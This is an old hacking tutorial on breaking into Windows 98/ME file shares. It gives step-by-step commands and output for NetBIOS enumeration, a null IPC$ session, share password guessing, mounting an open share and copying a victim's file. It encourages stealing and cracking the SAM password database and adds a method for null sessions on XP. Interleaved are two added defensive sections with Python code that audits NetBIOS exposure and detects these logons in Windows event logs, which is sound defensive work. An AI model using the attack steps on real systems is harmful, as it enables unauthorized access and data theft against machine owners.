Madirish Tutorial 09
C:\>nbtstat -A 215.25.200.152
Local Area Connection 2:
Node IpAddress: [0.0.0.0] Scope Id: []
    Host not found.
Local Area Connection:
Node IpAddress: [215.25.200.135] Scope Id: []
           NetBIOS Remote Machine Name Table
       Name               Type         Status
    ---------------------------------------------
    NCARTER        <00>  UNIQUE      Registered
    SVNET          <00>  GROUP       Registered
    NCARTER        <20>  UNIQUE      Registered
    SVNET          <1E>  GROUP       Registered
    NCARTER        <03>  UNIQUE      Registered
    NCARTER        <1F>  UNIQUE      Registered
    MAC Address = 00-00-E8-9A-9E-12
\Device\NetBT_Tcpip_{7CD42A51-8B2F-4A5F-A42E-1C76F336D3DE}:
Node IpAddress: [215.25.200.140] Scope Id: []
           NetBIOS Remote Machine Name Table
       Name               Type         Status
    ---------------------------------------------
    NCARTER        <00>  UNIQUE      Registered
    SVNET          <00>  GROUP       Registered
    NCARTER        <20>  UNIQUE      Registered
    SVNET          <1E>  GROUP       Registered
    NCARTER        <03>  UNIQUE      Registered
    NCARTER        <1F>  UNIQUE      Registered
    MAC Address = 00-00-E8-9A-9E-12
Using this command I have found that the username on this computer is NCARTER, and the workgroup is SVNET. Now the fun begins:
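The name table above is worth reading more carefully than the tutorial does, because each row carries a suffix that says which service registered the name. The following is an added example, not code from the tutorial: a small Python parser for the nbtstat -A output format that decodes the suffixes (meanings taken from Microsoft's published NetBIOS suffix list) and reduces the table to what an unauthenticated query gives away about a host, which is the check to run against your own perimeter machines. The sample block is the tutorial's own table, embedded as constructed input; the function names are assumptions.

```python
import re
from collections import namedtuple

# NetBIOS name suffixes as documented by Microsoft (KB 163409). Only the
# suffixes that appear in the tutorial's table are listed here.
SUFFIXES = {
    ("00", "UNIQUE"): "Workstation Service (computer name)",
    ("00", "GROUP"):  "domain or workgroup name",
    ("03", "UNIQUE"): "Messenger Service (computer name or logged-on user)",
    ("20", "UNIQUE"): "File Server Service (host offers SMB shares)",
    ("1E", "GROUP"):  "Browser Service elections",
    ("1F", "UNIQUE"): "NetDDE Service",
}

Record = namedtuple("Record", "name suffix kind status")

# One table row: "<name>   <xx>  UNIQUE|GROUP   Registered". Names may contain
# spaces, so the name group is delimited by the following "<xx>" token.
ROW = re.compile(r"^\s*(\S.*?)\s+<([0-9A-Fa-f]{2})>\s+(UNIQUE|GROUP)\s+(\S+)\s*$")
MAC = re.compile(r"MAC Address\s*=\s*([0-9A-Fa-f]{2}(?:-[0-9A-Fa-f]{2}){5})")

# Constructed input: the second name table shown in the tutorial.
SAMPLE = """\
Node IpAddress: [215.25.200.140] Scope Id: []
           NetBIOS Remote Machine Name Table
       Name               Type         Status
    ---------------------------------------------
    NCARTER        <00>  UNIQUE      Registered
    SVNET          <00>  GROUP       Registered
    NCARTER        <20>  UNIQUE      Registered
    SVNET          <1E>  GROUP       Registered
    NCARTER        <03>  UNIQUE      Registered
    NCARTER        <1F>  UNIQUE      Registered
    MAC Address = 00-00-E8-9A-9E-12
"""


def parse_nbtstat(text):
    """Return (records, mac) for one remote name table block."""
    records, mac = [], None
    for line in text.splitlines():
        m = ROW.match(line)
        if m:
            name, suffix, kind, status = m.groups()
            records.append(Record(name, suffix.upper(), kind, status))
            continue
        m = MAC.search(line)
        if m:
            mac = m.group(1).upper()
    return records, mac


def summarize(records):
    """Reduce the table to what an unauthenticated query gives away."""
    s = {"computer": None, "workgroup": None, "file_server": False,
         "messenger": [], "unknown": []}
    for r in records:
        if (r.suffix, r.kind) not in SUFFIXES:
            s["unknown"].append(r)  # keep anything we cannot classify visible
        if r.kind == "UNIQUE" and r.suffix == "00":
            s["computer"] = r.name
        elif r.kind == "GROUP" and r.suffix == "00":
            s["workgroup"] = r.name
        elif r.kind == "UNIQUE" and r.suffix == "20":
            s["file_server"] = True
        elif r.kind == "UNIQUE" and r.suffix == "03":
            s["messenger"].append(r.name)
    return s


def findings(text):
    """Human-readable audit lines for one host's table."""
    records, mac = parse_nbtstat(text)
    s = summarize(records)
    out = [f"computer name {s['computer']} in workgroup {s['workgroup']} (MAC {mac})"]
    if s["file_server"]:
        out.append("File Server Service <20> registered: SMB shares are reachable "
                   "from wherever this query was answered")
    for name in s["messenger"]:
        out.append(f"Messenger name {name!r} registered: may reveal a logged-on user")
    return out


if __name__ == "__main__":
    for line in findings(SAMPLE):
        print("-", line)
```

Note that a <00> UNIQUE entry is the computer name, not a user name; the tutorial's NCARTER is both only because the <03> Messenger entry happens to carry the same name. The <20> entry is the one that matters for exposure: it is the File Server Service, and its presence in a table answered from outside the network is what makes the rest of the tutorial possible.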
C:\>net use \\215.25.200.152\ipc$ /user:ncarter
Local name
Remote name       \\215.25.200.152\ipc$
Resource type     IPC
Status            OK
# Opens           0
# Connections     1
The command completed successfully.
Ok, this is a bit simulated; usually you'll have to enter a password, but I got lucky here and there was no password in effect. If there had been a password you could issue 'net use \\215.25.200.152\ipc$ /user:ncarter PASSWORD', where PASSWORD = your guess as to their password. Many systems will lock you out after 3 bad attempts, but you'd be surprised how many won't. What you're doing is trying to establish a null share connection.
C:\>net view \\215.25.200.152
Shared resources at \\215.25.200.152
Share name   Type         Used as  Comment
-------------------------------------------------------------------------------
HP COLOR     Print
MUSIC        Disk
PUBLIC       Disk
TOSEND       Disk
The command completed successfully.
Ok, now we know the names of the shares on this computer. Let's try to connect to the 'TOSEND' share:
C:\>net use u: \\215.25.200.152\tosend
The password is invalid for \\215.25.200.152\tosend.
Type the password for \\215.25.200.152\tosend:
System error 5 has occurred.
Access is denied.
No dice, it's password protected. Let's try the others:
C:\>net use y: \\215.25.200.152\public
The command completed successfully.
Bingo, we're in. Notice the y: in the 'net use' command? That's the local drive name that we're going to use as a link to NCARTER.
C:\>net view \\215.25.200.152
Shared resources at \\215.25.200.152
Share name   Type         Used as  Comment
-------------------------------------------------------------------------------
HP COLOR     Print
MUSIC        Disk        
PUBLIC       Disk         Y:
TOSEND       Disk
The command completed successfully.
C:\>dir y:
 Volume in drive Y is HP_PAVILION
 Volume Serial Number is 1C68-0F0A
 Directory of Y:
04/26/2000  12:56p      <DIR>          .
04/26/2000  12:56p      <DIR>          ..
04/26/2000  11:57a                 331 Shortcut to Sawmill5.0.lnk
04/26/2000  12:58p              29,696 hits.doc
04/26/2000  01:33p             978,918 wtapi.pdf
04/26/2000  01:44p              19,456 USER TIMEOUT.doc
05/04/2000  02:34p              23,552 Letterhead.dot
11/15/2000  06:37p              20,480 Contact list.doc
07/24/2000  01:19p              87,040 Elegant Fax.doc
09/18/2000  12:38p           7,710,412 KingofPrussia000918.pdf
06/26/2000  04:28p      <DIR>          HP Drivers
09/18/2000  05:04p              15,906 cover.jpg
06/22/2000  12:33p      <DIR>          halflife update
06/02/2000  02:05p      <DIR>          School 
09/06/2000  02:40p      <DIR>          abae
01/29/2000  05:33p      <DIR>          Content
04/27/2000  02:21p      <DIR>          photos
05/23/2000  01:22p      <DIR>          delete_button
03/01/2001  02:12p      <DIR>          Firewall Docs
06/20/2000  03:28p      <DIR>          Install
06/27/2000  10:26a      <DIR>          HomePage
07/12/2000  02:12p                 463 Team Fortress Classic Manual.lnk
09/18/2000  10:54a          16,864,741 wtetrial.exe
10/26/2000  04:39p      <DIR>          Visor programs
11/29/2000  03:39p              26,112 TCS VS letter.doc
              12 File(s)     25,777,107 bytes
              13 Dir(s)   5,406,457,856 bytes free
C:\>copy y:\hits.doc
        1 file(s) copied.
C:\>dir hits*
 Volume in drive C has no label.
 Volume Serial Number is 94B4-57C0
 Directory of C:
04/26/2000  12:58p              29,696 hits.doc
               1 File(s)         29,696 bytes
               0 Dir(s)   2,796,068,864 bytes free
The rest of what I did should be pretty obvious. I stole a copy of hits.doc and moved it to my local C: drive. Notice how easy all of this was?!? If you're really lucky you'll get an NT machine and be able to copy the SAM database file and crack it to get a list of all the users AND their passwords. Enjoy
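From the defender's side, the sequence this tutorial walks through (a null session, a few guesses against a share, then a successful mount) leaves a trail on any NT-family host; Windows 9x/ME machines like the one shown keep no security log at all, which is part of why they were such easy targets. The following is an added example, not code from the tutorial: detection logic run over a constructed batch of Windows Security events, with field names simplified from events 4624 (logon), 4625 (failed logon) and 5140 (network share accessed). The event IDs and the ANONYMOUS LOGON account name are real; the records, timestamps, source addresses (reused from the tutorial) and the 3-attempts-in-5-minutes threshold are assumptions for illustration.

```python
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample events (simplified from the fields of Windows Security
# events 4624, 4625 and 5140). The timeline mirrors the tutorial's steps as
# the host on 215.25.200.152 would record them.
EVENTS = [
    {"time": "2001-03-01T14:00:01", "id": 4624, "logon_type": 3,
     "user": "ANONYMOUS LOGON", "src": "215.25.200.135"},
    {"time": "2001-03-01T14:00:30", "id": 4625, "logon_type": 3,
     "user": "ncarter", "src": "215.25.200.135"},
    {"time": "2001-03-01T14:00:41", "id": 4625, "logon_type": 3,
     "user": "ncarter", "src": "215.25.200.135"},
    {"time": "2001-03-01T14:00:55", "id": 4625, "logon_type": 3,
     "user": "ncarter", "src": "215.25.200.135"},
    {"time": "2001-03-01T14:01:10", "id": 5140, "logon_type": 3,
     "user": "ANONYMOUS LOGON", "src": "215.25.200.135", "share": r"\\*\PUBLIC"},
    # one failure from another host: below any sensible burst threshold
    {"time": "2001-03-01T15:30:00", "id": 4625, "logon_type": 3,
     "user": "admin", "src": "215.25.200.140"},
]


def _ts(e):
    return datetime.fromisoformat(e["time"])


def anonymous_network_logons(events):
    """Sources that completed a network (type 3) logon as ANONYMOUS LOGON,
    which is how a null IPC$ session appears on an NT-family host."""
    return sorted({e["src"] for e in events
                   if e["id"] == 4624 and e["logon_type"] == 3
                   and e["user"].upper() == "ANONYMOUS LOGON"})


def failed_logon_bursts(events, threshold=3, window=timedelta(minutes=5)):
    """Sources with at least `threshold` failed logons inside one sliding
    window. The tutorial notes that some hosts lock after 3 bad tries and
    many never do; this is the alert to raise for the ones that do not."""
    per_src = defaultdict(list)
    for e in events:
        if e["id"] == 4625:
            per_src[e["src"]].append(_ts(e))
    bursts = {}
    for src, times in per_src.items():
        times.sort()
        best = start = 0
        for end in range(len(times)):
            while times[end] - times[start] > window:
                start += 1          # slide the window forward
            best = max(best, end - start + 1)
        if best >= threshold:
            bursts[src] = best
    return bursts


def anonymous_share_access(events):
    """Shares opened without any credential: a 5140 whose subject is the
    anonymous account means the share is readable by anyone who can reach it."""
    hits = defaultdict(set)
    for e in events:
        if e["id"] == 5140 and e["user"].upper() == "ANONYMOUS LOGON":
            hits[e["src"]].add(e["share"])
    return {src: sorted(shares) for src, shares in hits.items()}


def report(events):
    """One line per finding, in the order a triage analyst would read them."""
    lines = []
    for src in anonymous_network_logons(events):
        lines.append(f"{src}: anonymous network logon (null session)")
    for src, n in failed_logon_bursts(events).items():
        lines.append(f"{src}: {n} failed logons within 5 minutes")
    for src, shares in anonymous_share_access(events).items():
        lines.append(f"{src}: shares opened anonymously: {', '.join(shares)}")
    return lines


if __name__ == "__main__":
    for line in report(EVENTS):
        print(line)
```

Two caveats apply to using this for real. Event 5140 is only written when object-access auditing for file shares is enabled, so a host that never logs it is not necessarily clean, and the burst detector deliberately counts per source address rather than per account because the tutorial's guesses all target one name from one host; guessing spread across many accounts from one source is caught, guessing spread across many sources is not.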
-------------------------------------------------------------------------------------------
The tutorial, unfortunately, describes the method to connect to Windows 98, Windows ME and Samba shares only.  NT, 2000, and XP authenticate with a domain as well, so if you want to connect to an XP share you have to specify the domain in your username, for instance:
net use \\target.hostname.ext\ipc$ /USER:username@fulldomain.ext password
will allow you to connect to a null session on an XP machine.  It's sort of a pain in the butt.  To find your domain name you can either type
ipconfig /ALL
at the command line, or you can right click on your 'My Computer', select 'Properties' then click the 'Network Identification' tab.